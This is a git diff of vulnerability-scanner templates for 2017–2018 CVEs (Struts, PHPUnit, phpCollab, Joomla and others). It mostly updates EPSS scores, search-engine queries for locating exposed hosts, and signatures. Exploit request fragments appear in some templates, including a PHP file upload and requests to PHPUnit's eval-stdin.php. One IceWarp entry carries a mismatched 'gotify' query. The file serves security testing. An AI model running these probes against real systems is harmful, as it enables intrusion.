epss-score: 0.00142
- epss-percentile: 0.49103
+ epss-percentile: 0.49977
cpe: cpe:2.3:a:mcafee:network_data_loss_prevention:*:*:*:*:*:*:*:*
metadata:
max-request: 1
@@ -48,4 +48,4 @@ http:
part: header
words:
- "text/html"
-# digest: 4a0a00473045022100b96f472aaedfc274fdfdec8a3b816d78acbc2505300b1d40c565b457822a0cce0220437e462685b9f8c0bc91b355e244b8882fb26379f7d5f3c244f591b218cac549:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a0048304602210092d78e5c2ee601a72fc1005ecee2f4d612d4e1e2ad952794c3c9b11b002f77cb0221008c9d309becc69658e90dcaaa56997b4ddc7bbd5f7964589f4253b715708a4b2c:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2017/CVE-2017-5631.yaml b/http/cves/2017/CVE-2017-5631.yaml
index 8f0b35c820..665535b2a3 100644
--- a/http/cves/2017/CVE-2017-5631.yaml
+++ b/http/cves/2017/CVE-2017-5631.yaml
@@ -21,12 +21,13 @@ info:
cve-id: CVE-2017-5631
cwe-id: CWE-79
epss-score: 0.00286
- epss-percentile: 0.65504
+ epss-percentile: 0.68687
cpe: cpe:2.3:a:kmc_information_systems:caseaware:-:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: kmc_information_systems
product: caseaware
+ fofa-query: title="caseaware"
tags: cve2017,cve,edb,xss,caseaware,kmc_information_systems
http:
@@ -49,4 +50,4 @@ http:
- type: status
status:
- 200
-# digest: 490a0046304402207d69e52f52d55a7b3f0d17541fe9f915dd4df8934f92181ed2e92d60ac0c7bde022072d4faaaef53a8a71f6ad67625ef5ce22b85459680a16b880dabe2a2c39f4099:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a0046304402204bfed1bb3dad739a1ef9947e49b189c36f2e6b0b1d6f845ce934981c33f2633302202ba6d95bcd7b94e5cf7c6db6480c3a72fa840646907405d0f5cc57b7dfb6c1ff:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2017/CVE-2017-5638.yaml b/http/cves/2017/CVE-2017-5638.yaml
index 4a75dec841..fd2a9dce04 100644
--- a/http/cves/2017/CVE-2017-5638.yaml
+++ b/http/cves/2017/CVE-2017-5638.yaml
@@ -21,7 +21,7 @@ info:
cvss-score: 10
cve-id: CVE-2017-5638
cwe-id: CWE-20
- epss-score: 0.97543
+ epss-score: 0.97542
epss-percentile: 0.99995
cpe: cpe:2.3:a:apache:struts:2.3.5:*:*:*:*:*:*:*
metadata:
@@ -30,6 +30,8 @@ info:
vendor: apache
product: struts
shodan-query: html:"Apache Struts"
+ fofa-query: body="struts problem report"
+ google-query: intitle:"struts2 showcase"
tags: cve2017,cve,apache,kev,msf,struts,rce
http:
@@ -48,4 +50,4 @@ http:
- type: status
status:
- 200
-# digest: 4b0a00483046022100b13a1627744af175b5ff3208123d7121d1993c1da5916daba690480cb512f923022100fbb3814519400f6165a557af4ce8f740fd1f47aead0436e981e555de1894a22d:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502204804f37982a6760d4e6547fa3508c53ef48322c15d3d9512e50a4fc96c88ce3f022100fe1c4fa3553083679aad75f77fd4f611edbe82fa0717876a4a5781a654f3a057:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2017/CVE-2017-5689.yaml b/http/cves/2017/CVE-2017-5689.yaml
index 31c5b32685..2bc9106fca 100644
--- a/http/cves/2017/CVE-2017-5689.yaml
+++ b/http/cves/2017/CVE-2017-5689.yaml
@@ -29,6 +29,8 @@ info:
vendor: intel
product: active_management_technology_firmware
shodan-query: title:"Active Management Technology"
+ fofa-query: title="active management technology"
+ google-query: intitle:"active management technology"
tags: cve2017,cve,amt,intel,tenable,kev
http:
@@ -54,4 +56,4 @@ http:
- type: status
status:
- 200
-# digest: 4a0a00473045022100c1ebf3bfcfaab0443bed7c0c3767867af141501aac600f4f387e61c7d0dab97c022060fd9aabe9ac1b63059fb46dfa7eb24a6b438f68a5ee9f4f028cb7e65532233c:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100b00287c7a2a6ba526529b8d990b528ce377af16295c124a967356a08b6430f4202206dc31566afe6ca3dfcf7fbc70171e24f3e2c63902bdc59d568de62e08eafb897:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2017/CVE-2017-6090.yaml b/http/cves/2017/CVE-2017-6090.yaml
index 3c12870fda..0dde2a8972 100644
--- a/http/cves/2017/CVE-2017-6090.yaml
+++ b/http/cves/2017/CVE-2017-6090.yaml
@@ -26,7 +26,11 @@ info:
vendor: phpcollab
product: phpcollab
shodan-query: http.title:"PhpCollab"
+ fofa-query: title="phpcollab"
+ google-query: intitle:"phpcollab"
tags: cve,cve2017,phpcollab,rce,fileupload,edb,intrusive
+variables:
+ string: "CVE-2017-6090"
http:
- raw:
@@ -39,7 +43,7 @@ http:
Content-Disposition: form-data; name="upload"; filename="{{randstr}}.php"
Content-Type: application/x-php
-
+
-----------------------------154934846911423734231554128137--
- |
@@ -49,11 +53,11 @@ http:
matchers-condition: and
matchers:
- type: word
- part: body
+ part: body_2
words:
- - "48dbd2384cb6b996fa1e2855c7f0567f"
+ - '{{md5(string)}}'
- type: status
status:
- 200
-# digest: 4a0a0047304502210082359a86174a4f722113b6f6cb2339f0f2892f7a6860cc5272cdd6b668b345e202202711db56d7104f7f16cc78a571e79c7b1befe15bed8c5524b6dad8082dbae73b:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022024a8d29d33fa8252530cbb7f2948713c26ecce98344c9a9d976f12567408150c022100927252f4dcd48268d836e6b9155ee52daf04b3fcc9fc99e7a554874a57741681:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2017/CVE-2017-7269.yaml b/http/cves/2017/CVE-2017-7269.yaml
index 9514f14b50..578a6a829d 100644
--- a/http/cves/2017/CVE-2017-7269.yaml
+++ b/http/cves/2017/CVE-2017-7269.yaml
@@ -28,6 +28,7 @@ info:
max-request: 1
vendor: microsoft
product: internet_information_server
+ shodan-query: cpe:"cpe:2.3:a:microsoft:internet_information_server"
tags: cve2017,cve,rce,windows,iis,kev,microsoft
http:
@@ -53,4 +54,4 @@ http:
- type: status
status:
- 200
-# digest: 490a00463044022022020aa8a873fc818a13eee28f236f26cae0b0aa75204ada8c216d36f82b6d7c022027edcd8a1cc6e78bf98d96759d25094658fc6bce1a48f195a363cece01b7f99c:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a004630440220495b1fa854301eccccabfffc0d5758e79ca9d470d6c9daeed43c960791f9e12d022068e5219d420072a580169f3a2124207ad3774a71cbd02d18543af151bc886452:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2017/CVE-2017-7391.yaml b/http/cves/2017/CVE-2017-7391.yaml
index ed275c5a6d..5cef3d8885 100644
--- a/http/cves/2017/CVE-2017-7391.yaml
+++ b/http/cves/2017/CVE-2017-7391.yaml
@@ -21,12 +21,13 @@ info:
cve-id: CVE-2017-7391
cwe-id: CWE-79
epss-score: 0.00195
- epss-percentile: 0.56428
+ epss-percentile: 0.56964
cpe: cpe:2.3:a:magmi_project:magmi:0.7.22:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: magmi_project
product: magmi
+ shodan-query: http.component:"magento"
tags: cve2017,cve,magmi,xss,magmi_project
http:
@@ -49,4 +50,4 @@ http:
- type: status
status:
- 200
-# digest: 4a0a004730450220255b4c36fbfca640300f406d76a18de517faa9583bb267338fc7a2d4b36ac070022100e236f6809fd321445907dbc37b9c4def04ad09fc52f798e4324fa84812fd5331:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022032f11d9b1504fb042b6c91f441deb1a249e941dcbde63ac51f350b05b9e83f71022100875a24db627da0c59bd4743d91b6cca4c08dae7b6fa17d24f1a216284fd2b0a9:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2017/CVE-2017-7615.yaml b/http/cves/2017/CVE-2017-7615.yaml
index dce109934a..ac61004431 100644
--- a/http/cves/2017/CVE-2017-7615.yaml
+++ b/http/cves/2017/CVE-2017-7615.yaml
@@ -26,12 +26,14 @@ info:
cve-id: CVE-2017-7615
cwe-id: CWE-640
epss-score: 0.97404
- epss-percentile: 0.99917
+ epss-percentile: 0.99923
cpe: cpe:2.3:a:mantisbt:mantisbt:*:*:*:*:*:*:*:*
metadata:
max-request: 5
vendor: mantisbt
product: mantisbt
+ shodan-query: http.favicon.hash:662709064
+ fofa-query: icon_hash=662709064
tags: cve,cve2017,mantisbt,unauth,edb
http:
@@ -55,4 +57,4 @@ http:
- type: status
status:
- 200
-# digest: 490a0046304402200b9e716101bb9f2757f476a63cfce5c17b9dd089a0ba767e03f491ecace39fb6022045455d4187be15412d331dd2b561c4328cdde8acc3c42a3de9f9ceb407376d9b:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a004630440220158ca09ea384b1142ffa017940e328ef386bdf182bf063fa9cb058e9a9cb2b57022007c4d73a6544306d7581302f859a7724c44a9660e8374f67d47e3ec98208df3d:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2017/CVE-2017-7855.yaml b/http/cves/2017/CVE-2017-7855.yaml
index 73a298378d..47974bab8f 100644
--- a/http/cves/2017/CVE-2017-7855.yaml
+++ b/http/cves/2017/CVE-2017-7855.yaml
@@ -24,6 +24,8 @@ info:
vendor: icewarp
product: server
shodan-query: title:"icewarp"
+ fofa-query: title="gotify"
+ google-query: intitle:"gotify"
tags: cve,cve2017,xss,icewarp
http:
@@ -49,4 +51,4 @@ http:
- type: status
status:
- 200
-# digest: 4a0a00473045022100ecd748d0da7f1f3e5a44b0351d29bf699e21b0bcfd59e00013b81f7dde887d6f02204f738f06eb2c47e277ac21b6bf66fc965783038678586e2b9e397c57124bc240:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a0048304602210096b16c5bc06532125db7042b4a42f48e1284d769136ba0ff69a0b0938ede6d12022100cafa979697e2e675dc8f09112269314d9b7262d802b971342f4a6f336ac9b9d8:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2017/CVE-2017-7921.yaml b/http/cves/2017/CVE-2017-7921.yaml
index cc1ad0e3e8..8f03aa5507 100644
--- a/http/cves/2017/CVE-2017-7921.yaml
+++ b/http/cves/2017/CVE-2017-7921.yaml
@@ -21,7 +21,7 @@ info:
cve-id: CVE-2017-7921
cwe-id: CWE-287
epss-score: 0.01361
- epss-percentile: 0.85934
+ epss-percentile: 0.86195
cpe: cpe:2.3:o:hikvision:ds-2cd2032-i_firmware:-:*:*:*:*:*:*:*
metadata:
max-request: 1
@@ -45,4 +45,4 @@ http:
part: header
words:
- "application/xml"
-# digest: 4b0a00483046022100c915ea5b7a67b269e652cfe5189fbeef5beca1a6e3a09c0ee59298ed9bfbede3022100a8f03caa34047f0f2cd4751cf4c772529f216a56e3e91553f99c1a7eef9bd6e4:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502202fc20ee39e85f5fe1fee30017bf018dd548bd28468bc79ff6924b19001a637dc022100f9a502ee528a29825061ad581ea1efce6ba69e6cb7f6b655966e2117fb40ded1:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2017/CVE-2017-7925.yaml b/http/cves/2017/CVE-2017-7925.yaml
index 4e91d62001..50fabcbed7 100644
--- a/http/cves/2017/CVE-2017-7925.yaml
+++ b/http/cves/2017/CVE-2017-7925.yaml
@@ -27,6 +27,7 @@ info:
vendor: dahuasecurity
product: dh-ipc-hdbw23a0rn-zs_firmware
shodan-query: http.favicon.hash:2019488876
+ fofa-query: icon_hash=2019488876
tags: cve,cve2017,dahua,camera,dahuasecurity
http:
@@ -47,4 +48,4 @@ http:
group: 1
regex:
- 1:(.*:.*):1:CtrPanel
-# digest: 4a0a00473045022100b025841e51356e6480d45b4bdac30058df82b301fc177b329ddfaae64739dc7d022055c5f87e84ec531417e24f1d4eacca97cbb1485d8cda61206978c53803ee605b:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100eb029caf367f8db0b6350bdbb7b05a9622f3697a1629618e6bd455078d7793ba022100d707398eb77439d4e9261fb482ffd40bd033da6cf31d4178e5e6549d3cc6d8e8:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2017/CVE-2017-8917.yaml b/http/cves/2017/CVE-2017-8917.yaml
index 036670e1de..8e9d3f09cd 100644
--- a/http/cves/2017/CVE-2017-8917.yaml
+++ b/http/cves/2017/CVE-2017-8917.yaml
@@ -22,7 +22,7 @@ info:
cve-id: CVE-2017-8917
cwe-id: CWE-89
epss-score: 0.97555
- epss-percentile: 0.99997
+ epss-percentile: 0.99998
cpe: cpe:2.3:a:joomla:joomla\!:3.7.0:*:*:*:*:*:*:*
metadata:
verified: true
@@ -30,6 +30,7 @@ info:
vendor: joomla
product: joomla\!
shodan-query: http.component:"Joomla"
+ fofa-query: body="joomla! - open source content management"
tags: cve2017,cve,joomla,sqli
variables:
num: "999999999"
@@ -44,4 +45,4 @@ http:
part: body
words:
- '{{md5(num)}}'
-# digest: 490a0046304402202a42607f81069bc80a480ecb156ace94e0e76862ee4d3c4f68a9b927f241d59402207c07437e69c7376ab7c771a7bb2fa469bcc225985cb16e57a19da92fe3f20241:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a004630440220337c1a3d26746ee57aa8f2c45501e6031aff3aaeb6755d63a78d80d6bacba95f0220189d68a3a43e09495d3dcee847b6c11e956d2a63eb2ada3ff898d3c6d2a01dc9:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2017/CVE-2017-9140.yaml b/http/cves/2017/CVE-2017-9140.yaml
index de79ed77ef..0f7bc4af52 100644
--- a/http/cves/2017/CVE-2017-9140.yaml
+++ b/http/cves/2017/CVE-2017-9140.yaml
@@ -20,7 +20,7 @@ info:
cve-id: CVE-2017-9140
cwe-id: CWE-79
epss-score: 0.00191
- epss-percentile: 0.55758
+ epss-percentile: 0.56488
cpe: cpe:2.3:a:progress:telerik_reporting:*:*:*:*:*:*:*:*
metadata:
max-request: 1
@@ -44,4 +44,4 @@ http:
- type: status
status:
- 200
-# digest: 4b0a00483046022100e69bdcb3fa2b283c1b6182024ffdd266efd7457251b67234e56db326860d8c2b022100c6f67d7e4165debb3d19c617f22631630858768926f95b9f399c5a9980ab4302:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100a0ae3cee6c032779188defaba13ba515900432974163523509b991be8eb3bbe6022044aaab25b4230a8a91fd5f434ae326ca2b94cde43bf07ffffb32b94a7125bb7e:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2017/CVE-2017-9416.yaml b/http/cves/2017/CVE-2017-9416.yaml
index f2bc24d415..42a93b198d 100644
--- a/http/cves/2017/CVE-2017-9416.yaml
+++ b/http/cves/2017/CVE-2017-9416.yaml
@@ -18,14 +18,17 @@ info:
cvss-score: 6.5
cve-id: CVE-2017-9416
cwe-id: CWE-22
- epss-score: 0.01037
- epss-percentile: 0.83585
+ epss-score: 0.01187
+ epss-percentile: 0.85048
cpe: cpe:2.3:a:odoo:odoo:8.0:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 2
vendor: odoo
product: odoo
+ shodan-query: cpe:"cpe:2.3:a:odoo:odoo"
+ fofa-query: title="odoo"
+ google-query: intitle:"odoo"
tags: cve2017,cve,odoo,lfi
http:
@@ -51,4 +54,4 @@ http:
- "contains(body, 'extensions')"
- "status_code == 200"
condition: and
-# digest: 4a0a00473045022100eeb180faf838b4927b92bf8517268ab8712df323d040cc7f15dbb2aa4ab9062e02202242d7b85aaddb683b6a9c5637ecaf2c10d6770fa42f98931746defb95e70d7f:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a0046304402200ae1062b4d18e3bae8f1c1d9f3200e04c5d570c18548cb5416cca0a21ff2784d022017b86827595b36926951acc817a2da6dad10db2aeaf57e2bb88093764f8b572b:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2017/CVE-2017-9506.yaml b/http/cves/2017/CVE-2017-9506.yaml
index 69bed2f75e..156f658c9b 100644
--- a/http/cves/2017/CVE-2017-9506.yaml
+++ b/http/cves/2017/CVE-2017-9506.yaml
@@ -14,13 +14,14 @@ info:
- https://ecosystem.atlassian.net/browse/OAUTH-344
- https://medium.com/bugbountywriteup/piercing-the-veil-server-side-request-forgery-to-niprnet-access-171018bca2c3
- https://nvd.nist.gov/vuln/detail/CVE-2017-9506
+ - https://github.com/d4n-sec/d4n-sec.github.io
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2017-9506
cwe-id: CWE-918
epss-score: 0.00575
- epss-percentile: 0.75564
+ epss-percentile: 0.77897
cpe: cpe:2.3:a:atlassian:oauth:1.3.0:*:*:*:*:*:*:*
metadata:
max-request: 1
@@ -41,4 +42,4 @@ http:
part: interactsh_protocol # Confirms the HTTP Interaction
words:
- "http"
-# digest: 4a0a00473045022010826ceb3cc6e35143b7d9e13d87a6e20adf7cc28c355d0da4dcde85a4544058022100f3178910fc458d53ee0722f0e868981ccc3d9167c7c798cb25286ee17fb4cf63:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a00463044022058eadfb6c31de91652d2e3f2bbe583e23f200f085f6ce06d3612e9a68a41ba30022041068697a3cca76eacdb62a255ad06cd291e017b9ded3cb927ff3024ff4be806:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2017/CVE-2017-9791.yaml b/http/cves/2017/CVE-2017-9791.yaml
index 488403b049..e14b2a5a9c 100644
--- a/http/cves/2017/CVE-2017-9791.yaml
+++ b/http/cves/2017/CVE-2017-9791.yaml
@@ -31,6 +31,7 @@ info:
product: struts
shodan-query: title:"Struts2 Showcase"
fofa-query: title="Struts2 Showcase"
+ google-query: intitle:"struts2 showcase"
tags: cve2017,cve,apache,rce,struts,kev
variables:
num1: "{{rand_int(40000, 44800)}}"
@@ -61,4 +62,4 @@ http:
- type: status
status:
- 200
-# digest: 4a0a0047304502206d5e3820e512db011373ede9813749ce666b0b1030e3bafb75a433c8f747058d022100a71caf04a60f079184c23f7c442ca72d1e8642ac385157ab9944830e92448b58:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a004730450220654157dcb293d2d08454e1fb3aefe554654d48c0a62a31599bc162c7336a57d40221009f20fb2092c4f824918490ed55aa5eba154e0c9e2b3eab3ca83ebe97265d8de4:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2017/CVE-2017-9805.yaml b/http/cves/2017/CVE-2017-9805.yaml
index 8b453e5610..a1ac4bdffd 100644
--- a/http/cves/2017/CVE-2017-9805.yaml
+++ b/http/cves/2017/CVE-2017-9805.yaml
@@ -21,12 +21,15 @@ info:
cve-id: CVE-2017-9805
cwe-id: CWE-502
epss-score: 0.97541
- epss-percentile: 0.99995
+ epss-percentile: 0.99994
cpe: cpe:2.3:a:apache:struts:2.1.2:*:*:*:*:*:*:*
metadata:
max-request: 2
vendor: apache
product: struts
+ shodan-query: http.html:"apache struts"
+ fofa-query: body="struts problem report"
+ google-query: intitle:"struts2 showcase"
tags: cve,cve2017,apache,rce,struts,kev
http:
@@ -108,4 +111,4 @@ http:
- type: status
status:
- 500
-# digest: 4b0a00483046022100cb91351ec67515ace05e6ae7fa2ef9aaf72ca5a3503905a1343c7863f1d51213022100be2621cc621f53362aac304bffe96e3afce17ebe4ba91d4c9a554e7bccc800e6:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a004730450220122ca0a4f8e33eeadad533cea05bacbd79424b517cf01d019b6050fa9ab39fec022100c82eae0d2f07bab6718f05e23d1d487229f6ec694b7af767f8f22d19898e4c17:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2017/CVE-2017-9822.yaml b/http/cves/2017/CVE-2017-9822.yaml
index 97e44144e5..58cae6aff8 100644
--- a/http/cves/2017/CVE-2017-9822.yaml
+++ b/http/cves/2017/CVE-2017-9822.yaml
@@ -20,13 +20,14 @@ info:
cvss-score: 8.8
cve-id: CVE-2017-9822
cwe-id: CWE-20
- epss-score: 0.97056
- epss-percentile: 0.99742
+ epss-score: 0.96984
+ epss-percentile: 0.99734
cpe: cpe:2.3:a:dnnsoftware:dotnetnuke:*:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: dnnsoftware
product: dotnetnuke
+ fofa-query: app="dotnetnuke"
tags: cve2017,cve,packetstorm,dotnetnuke,bypass,rce,deserialization,kev,dnnsoftware
http:
@@ -50,4 +51,4 @@ http:
- type: status
status:
- 404
-# digest: 4a0a00473045022100e5a6fd927cb393e452ead22d7d8b924abfdf94422c410f8418c378a65793b36102202d80e248af2287baf5e074b0fe40a19537693f901e83fe06d05104b7f4607a1a:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a004830460221009be35f84b58a3b2534536d4717801b75f2f9cec7a15b7a50ddab4fa986660d9e022100f6a7a8f7f29cd485e81d17ed1b9b3fb1ce3f3be143c79087b917bd4abd3c0a57:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2017/CVE-2017-9833.yaml b/http/cves/2017/CVE-2017-9833.yaml
index fcdf436a30..2f6561f1b3 100644
--- a/http/cves/2017/CVE-2017-9833.yaml
+++ b/http/cves/2017/CVE-2017-9833.yaml
@@ -21,7 +21,7 @@ info:
cve-id: CVE-2017-9833
cwe-id: CWE-22
epss-score: 0.7354
- epss-percentile: 0.98027
+ epss-percentile: 0.98104
cpe: cpe:2.3:a:boa:boa:0.94.14.21:*:*:*:*:*:*:*
metadata:
max-request: 1
@@ -43,4 +43,4 @@ http:
- type: status
status:
- 200
-# digest: 4a0a00473045022100c6c5530e8a0f7728fab4cc19d39ab606e55af708d754eddf2173d358e60e8520022056dcf2c7ef111692f117a4df198df23d7ffdb051dbf23191bd3d3c8f2e81eaed:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100becb5b5f455cc2352342a916d40b8b3e767f4bb590ec0663ab0c43a8209036aa02207064fc85e40379fbe38b9715412a026a67a8c3556926dec684adb5320f215f33:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2017/CVE-2017-9841.yaml b/http/cves/2017/CVE-2017-9841.yaml
index c521f6727c..7fc7d18c96 100644
--- a/http/cves/2017/CVE-2017-9841.yaml
+++ b/http/cves/2017/CVE-2017-9841.yaml
@@ -27,6 +27,9 @@ info:
product: phpunit
tags: cve2017,cve,php,phpunit,rce,kev,phpunit_project
+variables:
+ string: "CVE-2017-9841"
+
http:
- raw:
- |
@@ -34,46 +37,46 @@ http:
Host: {{Hostname}}
Content-Type: text/html
-
+
- |
GET /yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
Host: {{Hostname}}
Content-Type: text/html
-
+
- |
GET /laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
Host: {{Hostname}}
Content-Type: text/html
-
+
- |
GET /laravel52/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
Host: {{Hostname}}
Content-Type: text/html
-
+
- |
GET /lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
Host: {{Hostname}}
Content-Type: text/html
-
+
- |
GET /zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
Host: {{Hostname}}
Content-Type: text/html
-
+
matchers-condition: and
matchers:
- type: word
part: body
words:
- - "6dd70f16549456495373a337e6708865"
+ - '{{md5(string)}}'
- type: status
status:
- 200
-# digest: 4b0a00483046022100a8b27a306468aebf732343c961456cf2432fb5a516c6c85ff6c4c62f0c01316e022100f2d5e57852cf73ca6546ebd6ddfbbec82b18542a7a84767a25cc65335fe9213d:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a0046304402202078c32d415f0d4e243e6fc17416ff9ade6bd20d2ae6a3ac252dfc8a6ee027c1022041e191ff34c16f28e3536af783ce63194343448ce56f545a72cec0572324b843:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2018/CVE-2018-0127.yaml b/http/cves/2018/CVE-2018-0127.yaml
index ffcab418a6..2ee61183cf 100644
--- a/http/cves/2018/CVE-2018-0127.yaml
+++ b/http/cves/2018/CVE-2018-0127.yaml
@@ -14,17 +14,18 @@ info:
- http://web.archive.org/web/20211207054802/https://securitytracker.com/id/1040345
- https://nvd.nist.gov/vuln/detail/CVE-2018-0127
- http://www.securitytracker.com/id/1040345
+ - https://github.com/ARPSyndicate/kenzer-templates
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2018-0127
cwe-id: CWE-306,CWE-200
epss-score: 0.09982
- epss-percentile: 0.94323
+ epss-percentile: 0.94853
cpe: cpe:2.3:o:cisco:rv132w_firmware:1.0.0.1:*:*:*:*:*:*:*
metadata:
max-request: 1
- vendor: "cisco"
+ vendor: cisco
product: rv132w_firmware
tags: cve,cve2018,cisco,router
@@ -47,4 +48,4 @@ http:
- type: status
status:
- 200
-# digest: 4b0a0048304602210099b0004c78261546ddee92f813ed07033007e7a8dd0ff0a86a8f24eedf199617022100a4d24a04b55d1f74aeb50551620875db7c38cba9f89652f3a5dbf50e545fae29:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502203b1c0946541693aca213fa88998f586c3530aee37c8ff6124163eb7cf846ab2f022100d71414aeee0ed44f7cc4620c564f10d312e85bd7fb2e8335d1d804b84c955c45:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2018/CVE-2018-1000129.yaml b/http/cves/2018/CVE-2018-1000129.yaml
index c7ad561227..796752264f 100644
--- a/http/cves/2018/CVE-2018-1000129.yaml
+++ b/http/cves/2018/CVE-2018-1000129.yaml
@@ -22,7 +22,7 @@ info:
cve-id: CVE-2018-1000129
cwe-id: CWE-79
epss-score: 0.00257
- epss-percentile: 0.64818
+ epss-percentile: 0.65435
cpe: cpe:2.3:a:jolokia:jolokia:1.3.7:*:*:*:*:*:*:*
metadata:
max-request: 2
@@ -56,4 +56,4 @@ http:
- type: status
status:
- 200
-# digest: 4b0a00483046022100ceae38b96d248c63737a82c437c72e4a369cf651d1c2371f95595a2622cc58d302210086e805d7edbfb0a898eacff9a76969da740278209f40b3ba6cba2e5d615cfa16:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100d13910ea51e10912ef8a7920f88602a7c375f607fd520c36d87b3e87222226ca02205885520f34c9569d052fafa49195b92d66c1d535316bea0686be5d5a582f3365:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2018/CVE-2018-1000130.yaml b/http/cves/2018/CVE-2018-1000130.yaml
index 6322e6368f..d3c30ba92a 100644
--- a/http/cves/2018/CVE-2018-1000130.yaml
+++ b/http/cves/2018/CVE-2018-1000130.yaml
@@ -14,13 +14,15 @@ info:
- https://jolokia.org/#Security_fixes_with_1.5.0
- https://access.redhat.com/errata/RHSA-2018:2669
- https://nvd.nist.gov/vuln/detail/CVE-2018-1000130
+ - https://github.com/ARPSyndicate/cvemon
+ - https://github.com/SexyBeast233/SecBooks
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 8.1
cve-id: CVE-2018-1000130
cwe-id: CWE-74
epss-score: 0.89191
- epss-percentile: 0.98492
+ epss-percentile: 0.9873
cpe: cpe:2.3:a:jolokia:webarchive_agent:1.3.7:*:*:*:*:*:*:*
metadata:
max-request: 1
@@ -54,4 +56,4 @@ http:
- type: status
status:
- 200
-# digest: 490a0046304402202738b8f849e2ff4cc3b3029c5fa5990ddaa02ff6f7dd9d8bfc66cd4e143726e002205dda92656c7b74f10e3a011a74db4fb26e23385d8f5feb67eb0f5c111f526f12:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a0046304402206994805bfe4800c98a7123de3e07dd8d4eb8acd1a998e52f4e5f4358b9f56dc502205ed9dfc8fc39f4989d9c2cd237d55365ba24b29b63e822461ec17bb65c97a7fe:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2018/CVE-2018-1000226.yaml b/http/cves/2018/CVE-2018-1000226.yaml
index 5eb5e5ebfa..c3245382d1 100644
--- a/http/cves/2018/CVE-2018-1000226.yaml
+++ b/http/cves/2018/CVE-2018-1000226.yaml
@@ -24,6 +24,9 @@ info:
max-request: 1
vendor: cobblerd
product: cobbler
+ shodan-query: http.title:"cobbler web interface"
+ fofa-query: title="cobbler web interface"
+ google-query: intitle:"cobbler web interface"
tags: cve2018,cve,cobbler,auth-bypass,cobblerd
http:
@@ -69,4 +72,4 @@ http:
- type: status
status:
- 200
-# digest: 4a0a0047304502201a7c5859f426d96f45cd86e280a49186d9b9ea388944c9ac9aa3c03a68f61219022100faca8e8923400b4cdf7ce1d714dde9bf2ed095375ead8f2870d6385412ee7e4e:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
